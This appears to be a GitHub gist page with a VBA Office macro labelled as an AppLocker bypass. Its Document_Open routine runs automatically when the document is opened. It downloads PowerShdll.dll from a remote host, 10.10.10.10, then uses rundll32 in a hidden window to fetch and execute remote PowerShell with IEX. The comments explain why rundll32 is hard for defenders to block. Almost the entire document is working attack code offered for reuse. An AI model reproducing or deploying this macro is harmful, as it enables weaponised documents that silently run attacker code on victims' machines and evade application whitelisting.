Forked from egre55/macro_download_and_execute_rundll32_powershdll_powershell.vba
Created
May 28, 2019 15:59
-
-
Save Celestial-intelligence/b75acfe85cb500039a0f83472fb056d2 to your computer and use it in GitHub Desktop.
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' based on | |
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer | |
' | |
' PowerShdll.dll by @p3nt4 | |
' https://github.com/p3nt4/PowerShdll | |
' | |
' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click | |
' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case) | |
Sub Document_Open() | |
Dim WinHttpReq As Object | |
Dim oStream As Object | |
Dim myURL As String | |
Dim LocalFilePath As String | |
myURL = "http://10.10.10.10/Powershdll.dll" | |
LocalFilePath = "C:\Windows\Tasks\Powershdll.dll" | |
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") | |
WinHttpReq.Open "GET", myURL, False, "", "" '("username", "password") | |
WinHttpReq.send | |
If WinHttpReq.Status = 200 Then | |
Set oStream = CreateObject("ADODB.Stream") | |
oStream.Open | |
oStream.Type = 1 | |
oStream.Write WinHttpReq.responseBody | |
oStream.SaveToFile LocalFilePath, 2 ' 1 = no overwrite, 2 = overwrite | |
oStream.Close | |
End If | |
Dim ExecFile As Double | |
ExecFile = Shell("rundll32 C:\Windows\Tasks\Powershdll.dll,main . IEX (iwr -useb http://10.10.10.10/encoded.txt)", vbHide) | |
End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment